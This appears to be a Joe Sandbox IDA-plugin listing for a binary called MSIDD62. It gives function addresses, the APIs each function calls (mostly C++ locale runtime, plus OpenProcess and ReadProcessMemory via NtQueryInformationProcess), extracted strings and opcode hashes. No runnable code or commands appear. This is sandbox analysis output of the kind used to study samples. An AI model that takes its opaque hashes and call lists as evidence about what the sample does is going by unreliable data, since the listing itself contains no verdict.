                                                                      • String ID: dJD$hJD$lJD$pJD$tJD$xJD$|JD
                                                                      • API String ID: 2732324234-253554797
                                                                      • Opcode ID: 505f068883c7f5b9049600b5b150f1ee61d53529cda4702d660a1eac354d3180
                                                                      • Instruction ID: be31a7dc8e9b851f16c43425728a068878b4392eaeee7130d82b8575fcf69704
                                                                      • Opcode Fuzzy Hash: 505f068883c7f5b9049600b5b150f1ee61d53529cda4702d660a1eac354d3180
                                                                      • Instruction Fuzzy Hash: D991EBB1D046155BD722AB66880577F7AA8EF81350F11853FF9457B2C1DF388D008BE9
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003FD8FD
                                                                      • ctype.LIBCPMT ref: 003FD944
                                                                        • Part of subcall function 003FD458: __Getctype.LIBCPMT ref: 003FD467
                                                                        • Part of subcall function 003F79C9: __EH_prolog3.LIBCMT ref: 003F79D0
                                                                        • Part of subcall function 003F79C9: std::_Lockit::_Lockit.LIBCPMT ref: 003F79DA
                                                                        • Part of subcall function 003F79C9: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7A4B
                                                                        • Part of subcall function 003F7AF3: __EH_prolog3.LIBCMT ref: 003F7AFA
                                                                        • Part of subcall function 003F7AF3: std::_Lockit::_Lockit.LIBCPMT ref: 003F7B04
                                                                        • Part of subcall function 003F7AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7B75
                                                                        • Part of subcall function 003F7CB2: __EH_prolog3.LIBCMT ref: 003F7CB9
                                                                        • Part of subcall function 003F7CB2: std::_Lockit::_Lockit.LIBCPMT ref: 003F7CC3
                                                                        • Part of subcall function 003F7CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7D34
                                                                        • Part of subcall function 003F7C1D: __EH_prolog3.LIBCMT ref: 003F7C24
                                                                        • Part of subcall function 003F7C1D: std::_Lockit::_Lockit.LIBCPMT ref: 003F7C2E
                                                                        • Part of subcall function 003F7C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C9F
                                                                        • Part of subcall function 003F4403: __EH_prolog3.LIBCMT ref: 003F440A
                                                                        • Part of subcall function 003F4403: std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                        • Part of subcall function 003F4403: std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • collate.LIBCPMT ref: 003FDA78
                                                                      • numpunct.LIBCPMT ref: 003FDCF2
                                                                        • Part of subcall function 003F838F: __EH_prolog3.LIBCMT ref: 003F8396
                                                                        • Part of subcall function 003F80C5: __EH_prolog3.LIBCMT ref: 003F80CC
                                                                        • Part of subcall function 003F80C5: std::_Lockit::_Lockit.LIBCPMT ref: 003F80D6
                                                                        • Part of subcall function 003F80C5: std::_Lockit::~_Lockit.LIBCPMT ref: 003F8147
                                                                        • Part of subcall function 003F81EF: __EH_prolog3.LIBCMT ref: 003F81F6
                                                                        • Part of subcall function 003F81EF: std::_Lockit::_Lockit.LIBCPMT ref: 003F8200
                                                                        • Part of subcall function 003F81EF: std::_Lockit::~_Lockit.LIBCPMT ref: 003F8271
                                                                        • Part of subcall function 003F4403: Concurrency::cancel_current_task.LIBCPMT ref: 003F44C6
                                                                        • Part of subcall function 003F75B6: __EH_prolog3.LIBCMT ref: 003F75BD
                                                                        • Part of subcall function 003F75B6: std::_Lockit::_Lockit.LIBCPMT ref: 003F75C7
                                                                        • Part of subcall function 003F75B6: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7638
                                                                      • __Getcoll.LIBCPMT ref: 003FDAB8
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                      • codecvt.LIBCPMT ref: 003FDDA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                      • String ID: ID$ID$ID$ID
                                                                      • API String ID: 613171289-34575223
                                                                      • Opcode ID: 58da07a88f0b782d86f9213821daee510ba4df17670c4719be309b5e1584e3cc
                                                                      • Instruction ID: 73f2bc39e71947aa9da5a6ca5e9765ae33888d04584ae2a95fcf56a56fd8b6d0
                                                                      • Opcode Fuzzy Hash: 58da07a88f0b782d86f9213821daee510ba4df17670c4719be309b5e1584e3cc
                                                                      • Instruction Fuzzy Hash: C6E105B1D0021E9BDB13AFA68C0667F7AAAEF41350F15852EFA586F391DF708D009791
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000018,755CD0F6,?,00000000), ref: 003EF076
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EF0B3
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EF11D
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EF2B9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EF376
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003EF39E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 975656625-1062449267
                                                                      • Opcode ID: 8bb68f5871c6fb835b18df4ff07d57ffd89bd929ad8c806085238b96d5108943
                                                                      • Instruction ID: d37d4a9e7179aa4cc7245c6add5c9d5ba4ff1bd11c1c5567991a208376ffe481
                                                                      • Opcode Fuzzy Hash: 8bb68f5871c6fb835b18df4ff07d57ffd89bd929ad8c806085238b96d5108943
                                                                      • Instruction Fuzzy Hash: 51B194B1D00398DEEB21CFA5C9457DEBBF4BF14304F1482AEE544AB281E7B59A48CB51
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,755CD0F6,?,00000000), ref: 003E6AC2
                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,755CD0F6,?,00000000), ref: 003E6AE3
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,755CD0F6,?,00000000), ref: 003E6B16
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,755CD0F6,?,00000000), ref: 003E6B27
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6B45
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6B61
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6B89
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6BA5
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6BC3
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6BDF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$Process$OpenTimes
                                                                      • String ID:
                                                                      • API String ID: 1711917922-0
                                                                      • Opcode ID: 6a32160eb9abce5dee8ee632c847e6230db69221703f1878b11b150923296b90
                                                                      • Instruction ID: c3332f7ff175b5a291c3035aff3665fcb22d54c7ae428c69ec270528047ab66f
                                                                      • Opcode Fuzzy Hash: 6a32160eb9abce5dee8ee632c847e6230db69221703f1878b11b150923296b90
                                                                      • Instruction Fuzzy Hash: 43515F70E01269EBDB11CF9AC985BEEFBB5AB58714F208219E514B73C0C7B45D01CBA8
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 0040083B
                                                                        • Part of subcall function 003F780A: __EH_prolog3.LIBCMT ref: 003F7811
                                                                        • Part of subcall function 003F780A: std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003F780A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1538362411-2891247106
                                                                      • Opcode ID: dbddf87328ffe3bf29a37b6463842d90e753a904d47ad3f0fa79dda4125fe4c2
                                                                      • Instruction ID: 255e81a332aafb492a6943641a8e85ed63b425f2a5dab3ad53a3c7172f0b32a1
                                                                      • Opcode Fuzzy Hash: dbddf87328ffe3bf29a37b6463842d90e753a904d47ad3f0fa79dda4125fe4c2
                                                                      • Instruction Fuzzy Hash: CEC1B2B254010AAFDB19DF98C996FFF7BB8AB15304F14012BFA42B7291D634DA00DB65
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 004059E9
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 14e68ca2383ec9fa6b7cd896350f1245d28d0146a883be4b99c212604438234d
                                                                      • Instruction ID: 0a520b8e654d80b27f36c8a5424e8c236e1767b77337a3f29d240c7ebe108f10
                                                                      • Opcode Fuzzy Hash: 14e68ca2383ec9fa6b7cd896350f1245d28d0146a883be4b99c212604438234d
                                                                      • Instruction Fuzzy Hash: 40C14076500609AEDB14DF58C999DFB3BB8EF45304F14452BFA02F6291D638EA00CF69
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00400C2B
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 1c2cf23dfa3c4dc3595f2cfb7b4c9122d6b6f177dc1620175e2c128fdf3aa9d8
                                                                      • Instruction ID: cba80ec2553485ed7afe9cf7b15e1df5a74fd3ba5ea760020670812e33edba5b
                                                                      • Opcode Fuzzy Hash: 1c2cf23dfa3c4dc3595f2cfb7b4c9122d6b6f177dc1620175e2c128fdf3aa9d8
                                                                      • Instruction Fuzzy Hash: E8C1817250010AABDB29DFA8C955FFF3BA8EF05300F14452BFA06B6291D774DA01DB65
                                                                      APIs
                                                                        • Part of subcall function 003E6090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 003E60F4
                                                                        • Part of subcall function 003E6090: GetLastError.KERNEL32 ref: 003E6190
                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 003E6632
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 003E668B
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 003E6712
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 003E67F6
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 003E686E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 003E68C9
                                                                      • FreeLibrary.KERNEL32(?,?,00000000), ref: 003E691E
                                                                      Strings
                                                                      • NtQueryInformationProcess, xrefs: 003E662C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                      • String ID: NtQueryInformationProcess
                                                                      • API String ID: 253270903-2781105232
                                                                      • Opcode ID: f0a6b04105940df6293f76773f8768cb272f9a716925136ef1888eeba5616ea0
                                                                      • Instruction ID: 7f2fb8da700d5a668ac4acc2769a8e58c6c2cb77d75c35645cef96f1d59a243a
                                                                      • Opcode Fuzzy Hash: f0a6b04105940df6293f76773f8768cb272f9a716925136ef1888eeba5616ea0
                                                                      • Instruction Fuzzy Hash: 25B1A070D10758CADB20CF61C9497AEBBF4FF58308F20465EE449A7690D7B866C8CB95
                                                                      APIs
                                                                      • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 003E2C43
                                                                      • LocalFree.KERNEL32(?), ref: 003E2CA2
                                                                      • LocalFree.KERNEL32(?), ref: 003E2D0C
                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 003E2E94
                                                                        • Part of subcall function 003E3D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 003E3DA3
                                                                      • LocalFree.KERNEL32(?), ref: 003E2E13
                                                                      • LocalFree.KERNEL32(?), ref: 003E2E6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Local$Cert$#224CertificateContextNameString
                                                                      • String ID: H:D$Jm
                                                                      • API String ID: 2665452496-4264341832
                                                                      • Opcode ID: 35835e07d2b14e54d0bb785e5a4dc5a9a3ac05c07862b6d7ce025f6bf970b4d3
                                                                      • Instruction ID: f53aed865c738ea94a820c11c853b668d28ab0339683d1694584da6db7564497
                                                                      • Opcode Fuzzy Hash: 35835e07d2b14e54d0bb785e5a4dc5a9a3ac05c07862b6d7ce025f6bf970b4d3
                                                                      • Instruction Fuzzy Hash: 0091AE70D10299CFDB19CFA9C948B9EBBB5FF84304F20461DD015AB291D7B5AA84CB90
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 003FD498
                                                                      • _Maklocstr.LIBCPMT ref: 003FD501
                                                                      • _Maklocstr.LIBCPMT ref: 003FD513
                                                                      • _Maklocchr.LIBCPMT ref: 003FD52B
                                                                      • _Maklocchr.LIBCPMT ref: 003FD53B
                                                                      • _Getvals.LIBCPMT ref: 003FD55D
                                                                        • Part of subcall function 003F708B: _Maklocchr.LIBCPMT ref: 003F70BA
                                                                        • Part of subcall function 003F708B: _Maklocchr.LIBCPMT ref: 003F70D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 3549167292-2658103896
                                                                      • Opcode ID: e5921731693836cac34bccd1a403d2154fd95d813b49ea9703c95e92c9799155
                                                                      • Instruction ID: 5b9dfc4af28036cfe395cf571b3e30e9ee562724f82d98956126ed134ba37f9a
                                                                      • Opcode Fuzzy Hash: e5921731693836cac34bccd1a403d2154fd95d813b49ea9703c95e92c9799155
                                                                      • Instruction Fuzzy Hash: 34217171D00318BADF16EFA5D886AEE7B68EF05710F00841BBA199F192EB749540CBA1
                                                                      APIs
                                                                        • Part of subcall function 003F5C66: __EH_prolog3.LIBCMT ref: 003F5C6D
                                                                        • Part of subcall function 003F5C66: std::_Lockit::_Lockit.LIBCPMT ref: 003F5C78
                                                                        • Part of subcall function 003F5C66: std::locale::_Setgloballocale.LIBCPMT ref: 003F5C93
                                                                        • Part of subcall function 003F5C66: std::_Lockit::~_Lockit.LIBCPMT ref: 003F5CE6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003ECA1A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003ECA80
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003ECB4F
                                                                        • Part of subcall function 003F45A7: __EH_prolog3.LIBCMT ref: 003F45AE
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003ECC00
                                                                      • LocalFree.KERNEL32(?,?,?,0043B6C9,00000000,0043B6C9), ref: 003ECD01
                                                                      • __cftoe.LIBCMT ref: 003ECE5E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2085124900-1405518554
                                                                      • Opcode ID: 9d609ecb528f6c48f317b706f35e5fba6a6e097ff2f37d2ad768d7bc92de93ed
                                                                      • Instruction ID: aa7767b1620f72248ce2229249fd8d4f3a1b000f1c7e6709b623b1f7a39a3973
                                                                      • Opcode Fuzzy Hash: 9d609ecb528f6c48f317b706f35e5fba6a6e097ff2f37d2ad768d7bc92de93ed
                                                                      • Instruction Fuzzy Hash: 1F12AF71E10299DFDF11CFA9C885BAEBBF5EF04304F144269E815AB381E735AA05CB91
                                                                      APIs
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0040B34B
                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0040B459
                                                                      • _UnwindNestedFrames.LIBCMT ref: 0040B5AB
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0040B5C6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 2751267872-393685449
                                                                      • Opcode ID: 938b4d58193062096a934a215ab53d0f9201d7f94cb3e63aacea08c0da42a74f
                                                                      • Instruction ID: 2f07407eb5a4318e3daeaa54d7e30c4530a8e6d29c552e61df1dd77841428959
                                                                      • Opcode Fuzzy Hash: 938b4d58193062096a934a215ab53d0f9201d7f94cb3e63aacea08c0da42a74f
                                                                      • Instruction Fuzzy Hash: A8B13571800209EFCF15DFA5C8819AEB7B5EF14318B1481ABE8017B292D739DA51CBDA
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 003F0322
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 003F0367
                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 003F03DE
                                                                      • LocalFree.KERNEL32(?), ref: 003F041B
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,755CD0F6,755CD0F6,?,?), ref: 003F0546
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree$___std_exception_copy
                                                                      • String ID: ios_base::failbit set$iostream
                                                                      • API String ID: 2276494016-302468714
                                                                      • Opcode ID: 7ecda72d8b6760f36c1087cfef66932a9a5dfee21579cd1e52a47f59ff87e790
                                                                      • Instruction ID: bdd490a89316dea442480bebfe934a3a6ae98a6e978e12a4473e1c60263e8bb3
                                                                      • Opcode Fuzzy Hash: 7ecda72d8b6760f36c1087cfef66932a9a5dfee21579cd1e52a47f59ff87e790
                                                                      • Instruction Fuzzy Hash: B0A1A1B1D00208DFDB09CF69D984BAEFBB5FB48310F10826EE515AB392DB749940CB95
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000044,755CD0F6,?,00000000), ref: 003EBA8B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EBAC8
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EBB35
                                                                      • __Getctype.LIBCPMT ref: 003EBB7E
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EBBF2
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EBCAF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3635123611-1405518554
                                                                      • Opcode ID: 45298b7ebd595602ade737cc2893e03b0449b869ca8ecaa37840e361c90589c4
                                                                      • Instruction ID: 1ead2bf5be80c6b28508cebf6253448d01ed5895297d59eaa86217dee16c51f4
